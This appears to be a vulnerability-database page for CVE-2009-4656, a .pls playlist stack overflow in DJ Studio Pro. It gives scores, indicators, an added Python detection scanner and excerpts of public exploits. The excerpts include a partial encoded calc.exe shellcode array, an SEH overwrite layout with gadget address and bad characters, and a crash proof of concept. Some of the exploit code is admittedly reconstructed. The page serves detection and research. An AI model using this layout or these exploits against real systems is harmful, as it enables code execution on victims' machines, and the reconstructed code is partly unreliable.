CVE-2009-4656
Published 2010-03-03
Priority: P3 (47) · CVSS 2.0 base score 9.3 (critical), vector AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit: public (see the Exploit-DB and Metasploit entries below)
EPSS: 31.72% (percentile 98.1)
Stack-based buffer overflow in E-Soft DJ Studio Pro 4.2 including 4.2.2.7.5, and 5.x including 5.1.4.3.1, allows user-assisted remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a playlist file (.pls) containing a long string. NOTE: some of these details are obtained from third party information.
Affected (4 ranges listed; the page gives no version bounds or fixed version for any of them)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| e-soft.co | dj_studio_pro | — (the description covers 4.2 through 4.2.2.7.5 and 5.x through 5.1.4.3.1; the public exploits target 5.1.6.5.2) | — |
Detection & IOCs (extracted from the sources listed below)
- Bytes: \xeb\x06\x90\x90\x2d\xc6\x4f\x01 (JMP SHORT +6, two NOPs, then the SEH handler 0x014FC62D in little-endian form)
- Bytes: \xda\xdc\xd9\x74\x24\xf4\x5d\x55\x59\x49\x49\x49\x49\x49 (the first 14 bytes of the encoded calc.exe payload in the 2009-12-30 Ruby exploit: a fnstenv GetPC stub followed by the alphanumeric decoder prefix)
- A malicious .pls file triggers an SEH-based stack buffer overflow. Look for .pls files with a 1308-byte padding block followed by a short JMP (\xeb\x06\x90\x90) at offset 1308 and the SEH handler overwrite at offset 1312 (1308+4).
- The SEH overwrite targets a pop/pop/ret gadget at the fixed address 0x014FC62D inside DJStudioPro.exe; that address, stored as \x2d\xc6\x4f\x01, in a .pls file is a strong exploit indicator.
- Payload bad characters are \x00, \x0a and \x3d (null, newline, equals sign); encoded shellcode in a .pls file will avoid these bytes.
- The simpler crash PoC writes 350,000 'A' characters into a .pls file; any .pls file far beyond normal playlist size warrants inspection.
- The fixed pop/pop/ret address (0x014FC62D) is specific to DJStudioPro.exe 5.1.6.5.2 on Windows XP SP2 EN; the exploit will not work reliably against other versions or OS configurations without a new gadget address.
- Remote exploitation via a browser requires the .pls extension to be registered to DJ Studio Pro; this vector was not tested in the Metasploit module.
- The Metasploit module uses a stack adjustment of -3500 bytes and a payload space of 5000 bytes; payloads that exceed this space or need a different adjustment will require reconfiguration.
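To turn the indicators above into something that can be run over a quarantine directory, here is an added Python scanner. It is not code from this page, from the Metasploit module or from E-Soft. The layout constants (1308-byte padding, the \xeb\x06\x90\x90 stub, the 0x014FC62D handler, the three bad characters) are the ones listed above; the size thresholds MAX_SANE_SIZE and MAX_SANE_LINE, the benign playlist and the sample exploit layout are assumptions constructed for the demonstration, and the payload slot in the constructed sample holds INT3 filler rather than shellcode.

```python
"""Scan .pls playlists for the CVE-2009-4656 exploit indicators listed above.

Added example for this page; not code from the page, from the Metasploit
module or from E-Soft.  The layout constants come from the IOC list; the
size thresholds and the sample playlists are assumptions constructed here.
"""
import struct
import sys
from typing import List

PADDING_LEN = 1308                    # filler before the SEH record (IOC list)
NSEH = b"\xeb\x06\x90\x90"            # JMP SHORT +6, NOP, NOP: hops over the handler slot
SEH_ADDR = 0x014FC62D                 # pop/pop/ret in DJStudioPro.exe 5.1.6.5.2 (IOC list)
SEH_LE = struct.pack("<I", SEH_ADDR)  # b"\x2d\xc6\x4f\x01", the on-disk form
SEH_RECORD = NSEH + SEH_LE            # the 8-byte sequence from the "Bytes" IOC
BAD_CHARS = {0x00, 0x0A, 0x3D}        # null, newline, '=' (IOC list)
MAX_SANE_SIZE = 64 * 1024             # assumption: real playlists are a few KB
MAX_SANE_LINE = 1024                  # assumption: no real entry line is this long


def scan_pls(data: bytes) -> List[str]:
    """Return the reasons `data` looks like an exploit; an empty list means clean."""
    findings = []
    if len(data) > MAX_SANE_SIZE:
        findings.append(f"oversized playlist: {len(data)} bytes")
    longest = max((len(line) for line in data.split(b"\n")), default=0)
    if longest > MAX_SANE_LINE:
        findings.append(f"single line of {longest} bytes")
    rec_off = data.find(SEH_RECORD)
    if rec_off != -1:
        # Padding is measured from the start of the line the record sits on, so
        # the check also holds if the record follows a "File1=" style key.
        pad = rec_off - (data.rfind(b"\n", 0, rec_off) + 1)
        findings.append(f"nSEH/SEH record at offset {rec_off} after {pad} bytes of padding")
        tail = data[rec_off + len(SEH_RECORD):]
        # Encoded shellcode must avoid the bad characters; a long bad-char-free
        # run right after the record is consistent with an encoded payload.
        if len(tail) >= 256 and not (set(tail) & BAD_CHARS):
            findings.append(f"{len(tail)}-byte payload after the record avoids all bad chars")
    elif SEH_LE in data:
        findings.append(f"gadget address 0x{SEH_ADDR:08X} at offset {data.find(SEH_LE)}")
    return findings


def scan_file(path: str) -> List[str]:
    with open(path, "rb") as fh:
        return scan_pls(fh.read())


# --- constructed samples (not real captures) ---------------------------------
BENIGN_PLS = (b"[playlist]\nNumberOfEntries=1\nFile1=song.mp3\n"
              b"Title1=Example\nLength1=180\nVersion=2\n")
CRASH_PLS = b"A" * 350_000            # shape of the 2009 Perl crash PoC


def build_sample_layout(payload: bytes = b"\xcc" * 300) -> bytes:
    """Constructed file with the layout the IOCs describe.  The payload slot
    holds INT3 filler, not shellcode; it only has to be free of bad chars."""
    if set(payload) & BAD_CHARS:
        raise ValueError("payload contains a bad character")
    return b"A" * PADDING_LEN + SEH_RECORD + payload


if __name__ == "__main__":
    samples = {"benign": BENIGN_PLS, "crash": CRASH_PLS, "seh": build_sample_layout()}
    for name, blob in samples.items():
        print(name, scan_pls(blob) or "clean")
    for path in sys.argv[1:]:          # any .pls files given on the command line
        print(path, scan_file(path) or "clean")
```

The exact-record check is the high-confidence signal; the size and line-length checks are there to catch the crash PoC and any re-targeted variant that uses a different gadget address, which the caveat above says is required for other builds.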
No detection rules found.
Exploit-DB: DJ Studio Pro 5.1 - '.pls' Local Stack Buffer Overflow (Metasploit) (exploitdb, 2012-03-02, CVE-2009-4656)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

# The extraction dropped everything between the '<' of the class header and
# the '=>' after 'Name'; the standard Metasploit3 file-format skeleton is
# restored below (the two mixins are assumed from the SEH layout the IOCs describe).
class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'DJ Studio Pro 5.1 .pls Stack Buffer Overflow',
      'Description' => %q{
        This module exploits a stack-based buffer overflow in DJ Studio Pro 5.1.6.5.2.
        When handling a .pls file, DJ Studio will copy the user-supplied data on the stack
        without any proper bounds checking done beforehand, therefore allowing code
        execution under the context of the user.
      },
      'License'     => MSF_LICENSE,
      'Author'      =>
        [
          'Sebastien Duquette',
          'Death-Shadow-Dark',
          # listing truncated here on the page
Exploit-DB: DJ Studio Pro 5.1.6.5.2 - Local Overflow (SEH) (Metasploit) (exploitdb, 2012-02-20, CVE-2009-4656)
---
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

# As in the previous listing, the class header between '<' and '=>' was lost
# to extraction and the standard Metasploit3 skeleton is restored here
# (mixins assumed from the SEH layout the IOCs describe).
class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'DJ Studio Pro 5.1.6.5.2 SEH Exploit',
      'Description' => %q{
        This module exploits a stack-based buffer overflow in DJ Studio Pro 5.1.6.5.2.
        An attacker must send the file to the victim and the victim must open the file.
        Alternatively it may be possible to execute code remotely via an embedded
        PLS file within a browser, when the PLS extension is registered to DJ Studio Pro.
        This functionality has not been tested in this module.
      },
      # listing truncated here on the page
Exploit-DB: DJ Studio Pro 5.1.6.5.2 - Local Overflow (SEH) (exploitdb, 2009-12-30, CVE-2009-4656)
---
#!/usr/bin/ruby
# Exploit Title : DJ Studio Pro 5.1.6.5.2 SEH Exploit
# Date : 2009-12-30
# Author : Sébastien Duquette - [email protected]
# Software Link : http://www.e-soft.co.uk/
# Version : 5.1.6.5.2
# Tested on : Windows XP SP2 En
# OSVDB ID : 58159
# Overflow originally discovered by prodigy
# exec calc.exe
payload =
"\xda\xdc\xd9\x74\x24\xf4\x5d\x55\x59\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a" +
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" +
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" +
"\x75\x4a\x49\x49\x6c\x48\x68\x4b\x39\x45\x50\x43\x30\x45" +
"\x50\x43\x50\x4d\x59\x48\x65\x46\x51\x4a\x72\x43\x54\x4e" +
"\x6b\x51\x42\x46\x50\x4c\x4b\x50\x52\x44\x4c\x4c\x4b\
Exploit-DB: DJ Studio Pro 4.2 - '.pls' Local Crash (exploitdb, 2009-09-15, CVE-2009-4656)
---
#!/usr/bin/perl -w
#
# DJ Studio Pro 4.2 (.PLS file) Crash Vulnerability Exploit
#
# Found and exploited by prodigy
#
# Contact: [email protected]
#
# Vendor: http://www.e-soft.co.uk/
#
# Usage to reproduce the bug: once you have created the malicious file, load it and boooom!
#
# Platform: Windows
#
###################################################################
# ==PoC==
use strict;
use diagnostics;

my $file = "crash.pls";
# The string below repeated 5000 times: roughly 350,000 bytes of 'A' on a single
# line, with no playlist header at all.
my $boom = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;
# Lexical filehandle (the original bareword $FILE fails under 'use strict') and
# write mode '>' instead of append '>>', so a rerun does not keep growing the file.
open(my $FILE, '>', $file) or die "cannot open $file: $!";
print $FILE $boom;
close($FILE);
print "File Created successfully\n";
# ==EndPoC==
# Greetz: Greetz myself for finding the bug.
# milw0rm.com [2009-09-15]
Metasploit: DJ Studio Pro 5.1 .pls Stack Buffer Overflow
This module exploits a stack-based buffer overflow in DJ Studio Pro 5.1.6.5.2. When handling a .pls file, DJ Studio will copy the user-supplied data on the stack without any proper bounds checking done beforehand, therefore allowing code execution under the context of the user.
No writeups or analysis indexed.
References
- http://secunia.com/advisories/36728
- http://www.exploit-db.com/exploits/9691
- http://www.vupen.com/english/advisories/2009/2681
- https://exchange.xforce.ibmcloud.com/vulnerabilities/53310